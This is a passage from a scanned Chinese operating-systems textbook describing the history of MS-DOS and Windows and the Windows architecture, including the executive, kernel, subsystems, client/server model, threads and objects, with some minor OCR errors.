这 对 软盘 来 说 是 足够 了 , 但 对 硬盘 来 说 就 太 受 限制 了 , 而 且 一 个 目录 的 限制 过 于 死板 。 新 版 本 人 允 
许 目 录 包 含 子 目 录 和 文件 , 还 在 操作 系统 中 嵌入 了 内 容 丰 富 的 命令 集 , 提供 外 部 程序 必须 执行 的 
功能 , 这 些 外 部 程序 在 第 1 版 中 是 以 实用 程序 的 形式 提供 的 。 在 增加 的 功能 中 有 一 些 类 似 UNIX 
的 特征 ， 如 IO 重 定向 和 后 台 打印 。1/O 重 定向 是 指 为 给 定 的 应 用 程序 改变 输入 输出 的 能 力 。 驻 
留 内 存 部 分 则 增长 到 24KB。 

当 IBM 在 1984 年 发 布 PC ATHY, RAAT DOS 3.0。AT 包含 Intel 80286 处 理 器 ， 它 提 
供 扩充 访问 和 内 存 保护 功能 ， 而 DOS 中 却 没有 使 用 这 些 新 功能 。 为 保证 与 以 前 版 本 的 兼容 性 ， 
操作 系统 仅仅 把 80286 简单 地 当做 一 个 “快速 的 8086”。 操 作 系 统 提供 了 对 新 键盘 和 硬盘 外 围 设 
备 的 支持 。 即 便 如 此 ， 对 存储 器 的 要 求 还 是 增长 到 了 36KB。3.0 版 本 有 几 个 比较 著名 的 升级 ， 
1984 年 发 布 的 DOS 3.1 支持 PC 间 的 联网 , 常 驻 部 分 的 大 小 没有 改变 , 这 是 通过 增加 操作 系统 交 
换 量 实现 的 ; 1987 年 发 布 的 DOS 3.3 提供 了 对 新 型 IBM 机 器 PS/2 的 支持 。 同 样 , 这 个 版 本 没有 
使 用 PS/2 中 的 处 理 器 能 力 , 这 些 是 由 80286 和 32 位 的 80386 芯片 提供 的 。 常 驻 部 分 最 少 增长 到 
了 46KB， 如 果 选 择 了 某 些 可 选 的 扩展 功能 ， 则 还 会 需要 更 多 的 空间 。 

teat, DOS 所 使 用 的 环境 已 远 远 超出 了 它 的 能 力 。 随 着 80486 的 引入 Intel Pentium 芯片 提 
供 的 能 力 和 功能 已 经 不 能 用 简单 的 DOS 来 开发 。 在 此 期 间 ， 从 20 世纪 80 年 代 早 期 开始 ， 微 软 
开始 开发 一 种 可 以 放 人 用 户 和 DOS 之 间 的 图 形 化 用 户 界 面 ( GUI)， 其 目的 是 为 了 与 Macintosh 
竞争 。Macintosh 的 操作 系统 无 比 好 用 。1990 年 ， 微 软 有 了 一 个 GUI 版 本 ， 称 做 Windows 3.0, 
其 用 户 友好 性 接近 Macintosh, 但 是 ， 它 仍然 需要 运行 在 DOS 之 上 。 

在 微软 为 IBM 研制 下 一 代 操 作 系 统 的 过 程 中 ， 它 希望 开发 新 的 微 处 理 器 的 能 力 ， 并 结合 
Windows 易于 使 用 的 特点 。 在 这 种 尝试 失败 后 , 微软 终于 超越 了 自我 , 研制 出 一 种 全 新 的 操作 系 
统 Windows NT. Windows NT 充分 利用 当代 微 处 理 器 的 能 力 ， 提 供 单 用 户 环 境 或 多 用 户 环境 下 
的 多 任务 。 

第 一 版 Windows NT (3.1) 在 1993 年 发 布 ， 它 是 同 Windows 3.1 有 着 相同 GUI 的 另 一 个 微 
软 操作 系统 (Windows 3.0 的 后 继 )。 但 是 ，Windows NT 3.1 是 一 个 新 的 32 位 操作 系统 ， 具 有 支 
持 老 的 DOS 和 Windows 应 用 程序 的 能 力 ， 并 提供 了 对 OS/2 的 支持 。 

在 几 个 Windows NT 3.x 版 本 之 后 ， 微 软 发 布 了 Windows NT 4.0。Windows NT 4.0 本 质 上 与 
Windows 3.x 具有 相同 的 内 部 结构 ， 最 显著 的 外 部 变化 是 Windows NT 4.0 提供 了 与 Windows 95 - 
相同 的 用 户 界 面 。 主 要 的 结构 变化 是 在 Windows 3.x 中 作为 Win32 子 系统 一 部 分 的 几 个 图 形 组 件 
( 在 用 户 态 下 运行 ) 被 移 到 Windows NT 执行 体 (在 内 核 态 下 运行 ) 中 。 这 个 变化 的 优点 是 加 速 
了 这 些 重 要 函数 的 操作 , 而 潜在 的 缺陷 是 这 些 图 形 函 数 现在 可 以 使 用 低层 系统 服务 , 这 可 能 会 对 
操作 系统 的 可 靠 性 产生 影响 。 

在 2000 年 ， 微 软 引进 了 下 一 个 重要 的 升级 版 本 ， 现 在 称 为 Windows 2000。 同 样 ， 底 层 的 执行 体 
和 内 核 结构 与 Windows NT 4.0 在 根本 上 是 相同 的 , 但 是 还 增加 了 一 些 新 特点 。Windows 2000 的 重点 是 
增加 支持 分 布 处 理 的 服务 和 功能 ，Windows 2000 新 特征 的 核心 元 素 是 活动 目录 ( Active Directory ), 这 
是 一 个 分 布 目录 服务 ,能 够 将 任意 对 象 名 映射 到 关于 这 些 对 象 的 任意 类 型 的 信息 上 。Windows 2000 也 
增加 了 即 插 即 用 和 电源 管理 工具 ， 这 些 特 性 已 经 在 Windows 98 中 存在 ， 继 承 于 Windows 95。 这 些 特 
性 对 笔记 本 电脑 特别 重要 ， 因 为 笔记 本 电脑 经 常 使 用 扩展 设备 (docking station) 和 电池 供电 。 

关于 Windows 2000 的 最 后 一 点 是 Windows 2000 Server 和 Windows 2000 desktop 的 区 别 。 本 
EE, 内核 、 执 行程 序 结构 和 服务 保持 相同 , 但 Server 还 包括 一 些 用 作 网 络 服务 器 时 所 需 的 服务 。 

在 2001 年 ， 微 软 发 布 了 最 新 的 桌面 操作 系统 Windows XP， 同 时 提供 了 家 用 和 商业 工作 站 
两 种 版 本 。 同 样 在 2001 年 发 布 了 64 位 版 本 的 Windows XP。2003 年 ,微软 又 发 布 了 新 的 服务 器 
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版 本 Windows Server 2003, 包括 32 位 和 64 位 两 种 。Windows Server 2003 主要 为 Intel 的 Itanium 
硬件 设计 。 在 为 Sever 2003 升级 的 第 一 个 服务 包 中 ， 微软 在 桌面 版 和 服务 器 版 中 都 引入 了 对 
AMD64 处 理 器 结构 的 支持 。 

2007 年 ，Windows Vista 作为 最 新 的 桌面 版 本 的 Windows 操作 系统 发 布 。Vista 对 Intel x86 
和 AMD x64 结构 都 提供 支持 。 发 布 版 主要 的 改动 细节 在 于 图 形 用 户 界 面 ( GUI) 的 变化 ， 以 及 
许多 对 安全 性 的 改进 。 对 应 的 服务 器 版 本 是 Windows Server 2008。 


2.5.2 单 用 户 多 任务 


Windows (JA Windows 2000 以 后 ) 是 微机 操作 系统 新 潮流 的 一 个 重要 例子 ( 其 他 例子 有 
Linux 和 MacOS )。Windows 的 动因 是 开发 当今 的 32 位 和 64 位 微 处 理 器 处 理 能 力 的 需求 ， 在 速 
度 、 硬 件 完善 度 和 存储 能 力 几 个 方面 与 大 型 机 和 小 型 机 进行 竞争 。 

这 些 新 操作 系统 的 一 个 最 重要 的 特征 是 , 尽管 它们 仍然 希望 支持 一 个 单独 的 交互 用 户 , 但 它 
们 的 确 是 多 任务 操作 系统 。 两 个 主要 的 发 展 因素 引发 了 个 人 计算 机 、 工 作 站 和 服务 器 中 的 多 任务 
需求 。 首 先 ， 随 着 微 处 理 器 的 速度 和 存储 能 力 不 断 增长 以 及 虚拟 存储 器 的 支持 , 应 用 程序 变 得 更 
加 复杂 且 相 关 性 更 强 。 例 如 , 用 户 可 能 希望 同时 使 用 文字 处 理 器 、 画 图 程序 和 电子 表格 应 用 程序 
来 产生 文件 。 如 果 没 有 多 任务 , 用 户 要 创建 一 幅 图 并 把 它 粘贴 到 字 处 理 文件 中 , 则 需要 以 下 步骤 : 

1) 打开 画图 程序 。 

2) 创建 一 幅 图 并 保存 在 一 个 文件 中 或 一 个 临时 的 剪贴 板 中 。 

3 ) 关闭 画图 程序 。 

4) 打开 文字 处 理 程序 。 

5) 在 正确 的 位 置 插入 这 幅 图 。 

如 果 需 要 有 任何 修改 ， 用 户 必须 关闭 文字 处 理 程序 ， 打 开 画 图 程序 ， 编 辑 这 个 图 形 并 保存 ， 
关闭 画图 程序 ， 打开 文字 处 理 程序 , 插入 这 幅 修 改 后 的 图 。 这 很 快 就 会 变 得 单调 乏味 。 随 着 用 户 
可 以 得 到 的 服务 和 能 力 越 来 越 强大 、 种 类 越 来 越 多 , 单 任务 环境 变 得 更 加 笨拙 、 对 用 户 不 够 友好 。 
在 多 任务 环境 中 , 用 户 打开 所 需要 的 每 个 应 用 程序 , 并 让 它 保持 打开 状态 。 信息 可 以 在 这 些 应 用 
程序 间 很 容易 地 来 回 移动 。 每 个 应 用 程序 有 一 个 或 多 个 打开 的 窗口 , 图 形 界 面 和 诸如 上 鼠标 之 类 的 
指示 设备 使 得 用 户 可 以 在 环境 中 迅速 地 定位 。 

多 任务 的 第 二 个 动机 是 客户 /服务 器 计算 的 发 展 。 在 客户 /服务 器 计算 中 ,个 人 计算 机 或 工作 
站 (客户 ) 和 主机 系统 ( 服务 器 ) 联合 使 用 ， 以 实现 特定 的 应 用 。 它 们 两 个 被 连接 在 一 起 ， 每 一 
个 都 被 分 配给 一 部 分 与 其 能 力 相 适应 的 作业 。 客 户 / 服 务 器 可 以 在 个 人 计算 机 和 服务 器 的 局 域 网 
中 实现 ,或 者 可 以 通过 用 户 系 统 和 -一 台大 主机 ( 如 大 型 机 ) 间 的 连接 实现 。 一 个 应 用 程序 可 能 
涉及 一 台 或 多 台 个 人 计算 机 以 及 一 个 或 多 个 服务 器 设备 。 为 提供 所 需 的 响应 性 ， 操 作 系统 需要 
支持 复杂 的 实时 通信 硬件 和 相关 的 通信 协议 以 及 数据 传送 结构 , 同时 还 应 支持 正在 进行 的 用 户 
交互 。 

前 面 是 对 Windows 桌面 版 本 的 讨论 。Windows Server 版 本 也 是 多 任务 的 ,但 可 以 支持 多 个 
用 户 ， 它 支持 多 个 终端 服务 器 连接 ， 并 提供 网 络 中 多 个 用 户 使 用 的 共享 服务 。 作 为 一 个 Interet 
服务 器 ，Windows 可 以 支持 数 千 个 同时 发 生 的 Web 连接。 


2.5.3 体系 结构 


图 2.13 显示 了 Windows 2000 的 整体 结构 ， 以 后 的 各 种 版 本 的 Windows， 包 括 Vista， 在 这 
一 层 本 质 上 都 有 相同 的 结构 。 模 块 化 结构 给 Windows 2000 提供 了 相当 大 的 灵活 性 ， 它 可 以 在 各 
种 硬件 平台 上 执行 ， 可 运行 为 各 种 别 的 操作 系统 编写 的 应 用 程序 。 截 至 本 书写 作 时 ，Windows 
仅 在 Intel x86 和 AMD64 硬件 平台 上 实现 ， 服 务 器 版 也 支持 Intel IA64 (Itanium )。 
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Lsass 表示 本 地 安全 认证 服务 器 POSIX 表示 可 移植 操作 系统 接口 
GDI 表示 图 形 设 备 接口 DLL 表示 动态 链接 库 
白色 部 分 表示 可 执行 的 


图 2.13 Windows 和 Windows Vista 体系 结构 [RUSS05] 


和 几乎 所 有 操作 系统 一 样 ，Windows 把 面向 应 用 的 软件 和 操作 系统 核心 软件 分 开 , 后 者 包括 
在 内 核 态 下 运行 的 执行 体 、 内 核 、 设备 驶 动 器 和 硬件 抽象 层 。 内 核 模块 软件 可 以 访问 系统 数据 和 
硬件 ， 在 用 户 态 运 行 的 其 余 软 件 被 限制 访问 系统 数据 。 


操作 系统 组 织 
Windows 的 体系 结构 是 高 度 模块 化 的 。 每 个 系统 函数 都 正好 由 一 个 操作 系统 部 件 管理 , 操作 
系统 的 其 余部 分 和 所 有 应 用 程序 通过 相应 的 部 件 使 用 标准 接口 访问 这 个 函数 。 关 键 的 系统 数据 只 
能 通过 相应 的 函数 访问 。 从 理论 上 讲 , 任何 模块 都 可 以 移动 、 升 级 或 替换 ,而 不 需要 重 写 整 个 系 
统 或 它 的 标准 应 用 程序 接口 ( API )。 
Windows 的 内 核 态 组 件 包括 以 下 类 型 : 
@ 执行 体 : 包括 操作 系统 基础 服务 , 例如 内 存 管理 、 进 程 和 线程 管理 、 安 全 、I1/O 和 进程 间 
通信 。 . 
o 内 核 : 控制 处 理 器 的 执行 。 内 核 管理 包括 线程 调度 、 进 程 切 换 、 异 常 和 中 断 处 理 、 多 处 
理 器 同步 。 跟 执行 体 和 用 户 级 的 其 他 部 分 不 同 ， 内 核 本 身 的 代码 并 不 在 线程 内 执行 。 因 
此 ， 内 核 是 操作 系统 中 唯一 不 可 抢占 或 分 页 的 一 部 分 。 
@ 硬件 抽象 层 (Hardware Abstraction Layer，HAL): 在 通用 的 硬件 命令 和 响应 与 某 一 特 
定 平台 专用 的 命令 和 响应 之 间 进 行 映射 ， 它 将 操作 系统 从 与 平台 相关 的 重 件 差异 中 隔离 
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出 来 。HAL 使 得 每 个 机 器 的 系统 总 线 、 直 接 存储 器 访问 (DMA) 控制 器 、 中 断 控制 器 、 
系统 计时 器 和 存储 器 模块 对 内 核 来 说 看 上 去 都 是 相同 的 。 它 还 对 对 称 多 处 理 ( SMP ) 提 
供 支 持 ， 随 后 对 这 部 分 进行 解释 。 

@ 设备 驱动 : 用 来 扩展 执行 体 的 动态 库 。 这 些 库 包括 硬件 设备 驱动 程序 ， 可 以 将 用 户 Vo 
函数 调用 转换 为 特定 的 硬件 设备 WO 请 求 ， 动 态 库 还 包括 一 些 软件 构件 ， 用 于 实现 文件 
系统 、 网 络 协议 和 其 他 必须 运行 在 内 核 态 中 的 系统 扩展 功能 。 

© 窗口 和 图 形 系统 实现 图 形 用 户 界面 函数 ( 简称 GUI 函数 )， 例 如 处 理 窗口 、 用 户 界面 
控制 和 画图 。 

Windows 执行 体 包 括 一 些 特殊 的 系统 函数 模块 , 并 为 用 户 态 的 软件 提供 API。 以 下 是 对 每 个 

执行 体 模块 的 简单 描述 ， 

o I/O 管理 器 : 提供 了 应 用 程序 访问 IO 设备 的 一 个 框架 , 还 负责 为 进一步 的 处 理 分 发 合适 
的 设备 驱动 程序 。IO 管理 器 实现 了 所 有 的 Windows IO API， 并 实施 了 安全 性 、 设 备 命 
名 和 文件 系统 ( 使 用 对 象 管理 器 )。Windows LO 将 在 第 11 章 中 讲述 。 

@ 高 速 缓存 管理 器 : 通过 使 最 近 访 问 过 的 磁盘 数据 驻 留 在 内 存 中 以 供 快速 访问 ， 以 及 在 更 
新 后 的 数据 发 送 到 磁盘 之 前 ， 通 过 在 内 存 中 保持 一 段 很 短 的 时 间 以 延迟 磁盘 写 操作 ， 来 
提高 基于 文件 的 IO 性 能 。 

@ 对 象 管理 器 ; 创建 、 管 理 和 删除 Windows 执行 体 对 象 和 用 于 表示 诸如 进程 、 线 程 和 同步 
对 象 等 资源 的 抽象 数据 类 型 。 为 对 象 的 保持 、 命 名 和 安全 性 设置 实施 统一 的 规则 。 对 象 
管理 器 还 创建 对 象 句柄 ， 对 象 句 柄 是 由 访问 控制 信息 和 指向 对 象 的 指针 组 成 的 。 本 节 稍 
后 将 进一步 讨论 Windows 对 象 。 

© 即 插 即 用 管理 器 :决定 并 加 载 为 支持 一 个 特定 的 设备 所 需 的 驱动 。 

@ 电源 管理 器 ， 调 整 各 种 设备 间 的 电源 管理 ， 并 且 可 以 把 处 理 器 置 为 休眠 状态 以 达到 节 电 
的 目的 ， 甚 至 可 以 将 内 存 中 的 内 容 写 人 磁盘 ， 然 后 切断 整个 系统 的 电源 。 

@ 安全 访问 监控 程序 ， 强制 执行 访问 确认 和 审核 产生 的 规则 。Windows 面向 对 象 模型 允许 
统一 一 致 的 安全 视图 ， 直 到 组 成 执行 体 的 基本 实体 。 因 此 ，Windows 为 所 有 受 保护 对 象 
的 访问 确认 和 审核 检查 使 用 相同 的 例 程 ， 这 些 受 保护 对 象 包括 文件 、 进 程 、 地 址 空间 和 
IO 设备 。Windows 的 安全 性 将 在 第 15 章 讲述 。 

© 虚拟 内 存 管理 器 : 管理 虚拟 地 址 、 物 理 地 址 和 磁盘 上 的 页 面 文件 。 控 制 内 存 管 理 硬件 和 
相应 的 数据 结构 ， 把 进程 地 址 空间 中 的 虚 地 址 映射 到 计算 机 内 存 中 的 物理 页 。Windows 
虚拟 内 存 管理 将 在 第 8 章 讲述 。 

o 进程 /线程 管理 器 : 创建、 管理 和 删除 对 象 ， 跟 踪 进 程 和 线程 对 象 。Windows 进程 和 线程 
管理 将 在 第 4 章 讲 述 。 

o 配置 管理 器 : 负责 执行 和 管理 系统 注册 表 ， 系 统 注 册 表 是 保存 系统 和 每 个 用 户 参数 设置 
的 数据 仓库 。 

@ 本 地 过 程 调用 (Locai Procedure Call, LPC) 机 制 : 为 本 地 进程 实现 服务 和 子 系 统 间 的 
通信 ， 而 实现 的 一 套 高 效 的 跨 进程 的 过 程 调用 机 制 。 类 似 于 分 布 处 理 中 远程 过 程 调用 
( Remote Procedure Call, RPC) 的 方式 。 

用 户 态 进程 

Windows 支持 4 种 基本 的 用 户 进程 类 型 : 

© 特殊 系统 进程 需 进行 管理 系统 的 用 户 态 服务 ， 如 会 话 管 理 程序 、 认 证 子 系统 、 服 务 管 
理 程序 和 登录 进程 等 。 


56 R-BD F x 


@ 服务 进程 ; 打印 机 后 台 管 理 程序 、 事 件 记 录 器 、 与 设备 驱动 协作 的 用 户 态 构件 、 不 同 的 
网 络 服务 程序 以 及 许多 这 样 的 程序 。 微 软 和 外 部 的 软件 开发 者 都 要 使 用 它们 来 扩展 系统 
的 功能 ， 因 为 这 些 服务 是 在 Windows 系统 中 后 台 运 行 用 户 态 活 动 的 唯一 方法 。 
@ 环境 子 系统 : 提供 不 同 的 操作 系统 的 个 性 化 设置 ( 环境 )。 支 持 的 子 系统 有 Win32/WinFX 
和 POSIX。 每 个 环境 子 系统 包括 一 个 在 所 有 子 系统 应 用 程序 中 都 会 共享 的 子 系统 进程 和 
把 用 户 应 用 程序 调用 转换 成 本 地 过 程 调用 (LPC ) 和 /或 原生 Windows 调用 的 动态 链接 库 
(DLL )。 
@ 用 户 应 用 程序 ， 可 执行 程序 (EXE) 和 动态 链接 库 (DLL ) 向 用 户 提供 使 用 系统 的 功能 。 
EXE 和 DLL 一 般 是 针对 特定 的 环境 子 系统 ， 尽 管 这 其 中 有 一 些 作 为 操作 系统 组 成 部 分 的 程 
序 使 用 了 原生 系统 接口 (NTAPI ) 同样 , 也 支持 为 Windows 3.1 或 MS-DOS 写 的 16 位 程序 。 
Windows 支持 为 多 操作 系统 特性 写 的 应 用 程序 ，Windows 利用 一 组 在 环境 子 系统 保护 之 下 
的 通用 的 内 核 态 构件 来 提供 这 种 支持 。 每 个 子 系统 在 执行 时 都 包括 一 个 独立 的 进程 , 该 进程 包含 
共享 的 数据 结构 、 优先 级 和 需要 实现 特定 的 个 性 化 的 执行 对 象 的 句柄 。 当 第 一 个 这 种 类 型 的 应 用 
程序 启动 时 ，Windows 会 话 管理 器 会 启动 上 述 的 进程 。 子 系统 进程 作为 系统 用 户 运 行 , 因此 执行 
体会 保护 其 地 址 空间 免 受 普通 用 户 进 程 的 影响 。 
受 保护 的 子 系统 提供 一 个 图 形 或 命令 行 用 户 界面 , 为 用 户 定义 操作 系统 的 外 观 。 另外， 每 个 
受 保护 的 子 系 统 为 那个 特定 的 操作 环境 提供 API, 这 就 意味 着 为 那些 特定 的 操作 环境 创建 的 应 用 
程序 可 以 在 Windows 下 不 用 改变 即 可 运行 ， 其 原因 是 它们 看 到 的 操作 系统 接口 与 编写 它们 时 的 
接口 是 相同 的 。 
最 重要 的 子 系统 是 Win32。Win32 是 在 Windows NT 和 Windows 95 及 后 继 版 本 和 Windows 9x 
中 都 实现 了 的 API。 许 多 为 Windows 9x 系统 操作 系统 写 的 Win32 应 用 程序 可 以 不 用 改变 就 能 在 
NT 系统 上 运行 。 在 Windows XP 版 本 中 ,微软 重点 改进 了 与 Windows 9x 的 兼容 性 ， 这 样 他 们 就 
可 以 终止 对 9x 系列 的 支持 而 专注 于 NT 了 。 
最 新 的 Windows API 是 WinFX， 基 于 微软 的 .NET 编程 模型 。WinFX 在 Windows 中 是 作为 
win32 的 更 高 一 层 来 实现 的 ， 而 不 是 一 个 独立 的 子 系统 类 型 。 


2.5.4 客户 /服务 器 模型 


Windows 操作 系统 服务 、 受 保护 子 系统 和 应 用 程序 都 采用 客户 /服务 器 计算 模型 构造 ， 客 户 / 
服务 器 模型 是 分 布 式 计算 中 的 一 种 常用 模型 ， 将 在 本 书 的 第 六 部 分 讲述 。 正 如 Windows 的 设计 
一 样 ， 在 单个 系统 内 部 也 可 以 采用 相同 的 结构 。 

NT 原生 API 是 一 套 基 于 内 核 的 服务 ， 提 供 一些 核心 抽象 供 系统 使 用 ， 如 进程 、 线 程 、 虚 拟 
内 存 、L/O 和 通信 。 通 过 使 用 客户 /服务 器 模型 ，Windows 在 用 户 态 进程 中 提供 了 一 系列 丰富 的 服 
务 。 环 境 子 系 统 和 Windows 用 户 态 服务 都 是 以 进程 的 形式 实现 ， 通 过 RPC 与 客户 端 进行 通信 。 
每 个 服务 器 进程 等 待 客户 的 一 个 服务 请 求 ( 例如 , 存储 服务 、 进 程 创建 服务 或 处 理 器 调度 服务 )。 
客户 可 以 是 应 用 程序 或 另 一 个 操作 系统 模块 , 它 通过 发 送 消 息 请 求 服务 。 消息 从 执行 体 发 送 到 适 
当 的 服务 器 ,服务 器 执行 所 请 求 的 操作 ,并 通过 另 一 条 消息 返回 结果 或 状态 信息 , 再 由 执行 体 发 
送 回 客户 。 

客户 /服务 器 结构 的 优点 如 下 : 

o 简化 了 执行 体 。 可 以 在 用 户 态 服务 器 中 构造 各 种 各 样 的 API， 而 不 会 有 任何 冲突 或 重复 ; 

可 以 很 容易 地 加 入 新 的 API。 

@ 提高 了 可 靠 性 。 每 个 新 的 服务 运行 在 内 核 之 外 ， 有 自己 的 存储 空间 ， 这 样 可 以 免 受 其 他 

服务 的 干扰 ， 单 个 客户 的 失败 不 会 使 操作 系统 的 其 余部 分 甬 溃 。 
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@ 为 应 用 程序 与 服务 间 通 过 RPC 调用 进行 通信 提供 了 一 致 的 方法 ， 且 没有 限制 其 灵活 性 。 
RZE (function stub) 把 消息 传递 进程 对 客户 应 用 程序 隐藏 起 来 ， 应 数 桩 是 为 了 包装 
RPC 调用 的 一 小 段 代码 。 当 通过 一 个 API 访问 一 个 环境 子 系统 或 服务 时 ,位 于 客户 端 应 
用 程序 中 的 函数 桩 把 调用 参数 包 作 为 一 个 消息 发 送 给 一 个 服务 器 子 系统 执行 。 

@ 为 分 布 式 计算 提供 了 适当 的 基础 。 典 型 地 ， 分 布 式 计算 使 用 客户 /服务 器 模块 ， 通 过 分 布 
的 客户 和 服务 器 模块 以 及 客户 与 服务 器 间 的 消息 交换 实现 远程 过 程 调用 。 对 于 Windows， 
本 地 服务 器 可 以 代表 本 地 客户 应 用 程序 给 远程 服务 器 传递 一 条 消息 ， 客 户 不 需要 知道 请 
求 是 在 本 地 还 是 在 远程 得 到 服务 的 。 实 际 上 ， 一 条 请 求 是 在 本 地 还 是 远程 得 到 服务 ， 可 
以 基于 当前 负载 条 件 和 动态 配置 的 变化 而 动态 变化 。 


2.5.5 ”线程 和 SMP 


Windows 的 两 个 重要 特征 是 支持 线程 和 支持 对 称 多 处 理 ( SMP )， 这 些 在 2.4 节 都 曾经 讲述 
过 。[ RUSS05 ] 列 出 了 Windows 支持 线程 和 SMP 的 下 列 特征 : 

@ 操作 系统 例 程 可 以 在 任何 可 以 得 到 的 处 理 器 上 运行 ， 不 同 的 例 程 可 以 在 不 同 的 处 理 器 上 
同时 执行 。 

@ Windows 支持 在 单个 进程 的 执行 中 使 用 多 个 线程 。 同 一 个 进程 中 的 多 线程 可 以 在 不 同 的 
处 理 器 上 同时 执行 。 

@ 服务 器 进程 可 以 使 用 多 线程 ， 以 处 理 多 个 用 户 同 时 发 出 的 请 求 。 

@ Windows 提供 在 进程 间 共 享 数据 和 资源 的 机 制 以 及 灵活 的 进程 间 通 信 的 能 力 。 


2.5.6 Windows 对 象 


Windows 大 量 使 用 面向 对 象 设计 的 概念 。 面向 对 象 方法 简化 了 进程 间 资 源 和 数据 的 共享 , 便 
于 保护 资源 免 受 未 经 许可 的 访问 。Windows 使 用 的 面向 对 象 重 要 概念 如 下 : 
@ 封装 : 一 个 对 象 由 一 个 或 多 个 称 做 属性 的 数据 项 组 成 ， 在 这 些 数 据 上 可 以 执行 一 个 或 多 
个 称 做 服务 的 过 程 。 访 问 对 象 中 数据 的 唯一 方法 是 引用 对 象 的 一 个 服务 ， 因 此 ， 对 象 中 
的 数据 可 以 很 容易 地 保护 起 来 ， 避 免 未 经 授权 的 使 用 和 不 正确 的 使 用 ( 例如 试图 执行 不 
可 执行 的 数据 片 )。 
@ 对 象 类 和 实例 : 一 个 对 象 类 是 一 个 模板 ， 它 列 出 了 对 象 的 属性 和 服务 ， 并 定义 了 对 象 的 
某 些 特性 。 操 作 系 统 可 以 在 需要 时 创建 对 象 类 的 特定 实例 ， 例 如 ， 每 个 当前 处 于 活动 状 
态 的 进程 只 有 一 个 进程 对 象 类 和 一 个 进程 对 象 。 这 种 方法 简化 了 对 象 的 创建 和 管理 。 
© 继承 : 尽管 要 靠 手 工 编码 实现 ， 但 执行 体 使 用 继承 通过 添加 新 的 特性 来 扩展 对 象 类 。 每 
个 执行 体 类 都 基于 一 个 基 类 ， 这 个 基 类 定义 虚 方法 ， 以 便 支 持 创建 、 命 名 、 安 全 保护 和 
删除 对 象 。 调 度 程 序 对 象 是 继承 事件 对 象 属性 的 执行 体 对 象 ， 因 此 ， 它 们 能 使 用 常规 的 
同步 方法 。 其 他 特定 的 对 象 类 型 ( 如 设备 类 ), 允许 这 些 面向 特定 设备 的 类 从 基 类 中 继承 ， 
增加 额外 的 数据 和 方法 。 
@ 多 态 性 : Windows 内 部 使 用 通用 的 API 函数 集 操 作 任 何 类 型 的 对 象 ， 这 正 是 本 节 附录 B 
中 定义 的 多 态 性 的 一 个 特征 。 但 是 ， 由 于 许多 API 是 特定 的 对 象 类 型 所 特有 的 ， 因 此 
Windows 并 不 是 完全 多 态 的 。 
对 面向 对 象 概念 不 熟悉 的 读者 可 以 参阅 本 书 最 后 的 附录 Bo 
Windows 中 的 所 有 实体 并 非 都 是 对 象 。 当 数据 对 用 户 态 的 访问 是 开放 的 , 或 者 当 数 据 访 问 是 
共享 的 或 受 限 制 的 时 都 使 用 对 象 。 对 象 表示 的 实体 有 文件 、 进 程 、 线 程 、 信 号、 计时 器 和 窗口 。 
Windows 通过 对 象 管理 器 以 一 致 的 方法 创建 和 管理 所 有 的 对 象 类 型 ,对 象 管理 器 代表 应 用 程序 负 
责 创 建 和 销毁 对 象 ， 并 负责 授权 访问 对 象 的 服务 和 数据 。 
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执行 体 中 的 每 个 对 象 有 时 称 为 内 核对 象 ( 以 区 分 执行 体 并 不 关心 的 用 户 级 对 象 )， 作 为 内 核 
分 配 的 内 存 块 存在 ,并 且 只 能 被 内 核 访问 。 数 据 结构 的 一 些 元 素 ( 例如 对 象 名 、 安 全 参数 、 使 用 
计数 ) 对 所 有 的 对 象 类 型 都 是 相同 的 , 而 其 余 的 元 素 是 某 一 特定 对 象 所 特有 的 (例如 线程 对 象 的 
优先 级 )。 因 为 这 些 对 象 的 数据 结构 位 于 只 能 由 内 核 来 访问 的 进程 地 址 空间 中 ， 应 用 程序 不 可 能 
引用 这 些 数据 结构 并 且 直 接地 读 写 。 实际 上 , 应 用 程序 通过 一 组 执行 体 支 持 的 对 象 操作 函数 间接 
地 操作 对 象 。 当 对 象 创建 后 , 请求 创建 的 应 用 程序 得 到 该 对 象 的 句柄 , 句柄 实质 上 是 指向 被 引用 
对 象 的 指针 。 句 柄 可 以 被 同一 个 进程 中 的 任何 线程 使 用 ， 来 访问 可 操作 此 对 象 的 Win32 BK, 
或 者 被 复制 到 其 他 进程 中 。 

对 象 可 以 有 与 之 相关 联 的 安全 信息 ， 以 安全 描述 符 ( Security Descriptor, SD) 的 形式 表示 。 
安全 信息 可 以 用 于 限制 对 对 象 的 访问 , 例如 , 一 个 进程 可 以 创建 一 个 命名 信号 量 对 象 , 使 得 只 有 
某 些 用 户 可 以 打开 和 使 用 这 个 信号 。 信 和 号 对 象 的 安全 描述 符 可 以 列 出 那些 允许 (或 不 允许 ) 访问 
信号 对 象 的 用 户 ， 以 及 允许 访问 的 类 型 ( 读 、 写 、 改 变 等 )。 

在 Windows 中 ， 对 象 可 以 是 命名 的 ， 也 可 以 是 未 命名 的 。 当 一 个 进程 创建 了 一 个 未 命名 对 
象 ,. 对 象 管理 器 返回 这 个 对 象 的 句柄 ， 而 句柄 是 访问 该 对 象 的 唯一 途径 。 命 名 对 象 有 一 个 名 字 ， 
其 他 进程 可 以 使 用 这 个 名 字 获 得 对 象 的 句柄 。 例 如 ， 如 果 进 程 A 希望 与 进程 B 同步 ， 则 它 可 以 
创建 一 个 命名 事件 对 象 ， 并 把 事件 名 传递 给 B, 进程 B 打开 并 使 用 这 个 事件 对 象 ; 但 是 , 如果 A 
仅仅 希望 使 用 事件 同步 它 自己 内 部 的 两 个 线程 , 则 它 将 创建 一 个 未 命名 事件 对 象 , 因为 其 他 进程 
不 需要 使 用 这 个 事件 。 

作为 Windows 管理 的 对 象 的 一 个 例子 ， 下 面 列 出 了 微 内 核 管理 的 两 类 对 象 : 

@ 分 派 器 对 象 : 是 执行 体 对 象 的 子 集 ， 线 程 可 以 在 该 类 对 象 上 等 待 ， 用 来 控制 基于 线程 的 

系统 操作 的 分 派 和 同步 。 这 些 将 在 第 6 章 讲述 。 

@ 控制 对 象 : 被 内 核 组 件 用 来 管理 不 受 普 通 线程 调度 控制 的 处 理 器 操作 。 表 2.5 列 出 了 内 

核 控 制 对 象 。 

Windows 不 是 一 个 成 熟 的 面向 对 象 操作 系统 , 它 不 是 用 面向 对 象 语言 实现 的 , 完全 位 于 执行 
体 组 件 中 的 数据 结构 没有 表示 成 对 象 。 然 而 ，Windows 展现 了 面向 对 象 技 术 的 能 力 , 表明 了 这 种 
技术 在 操作 系统 设计 中 不 断 增 长 的 趋势 。 


表 2.5 Windows 内 核 控 制 对 象 


控制 对 象 说 FA 
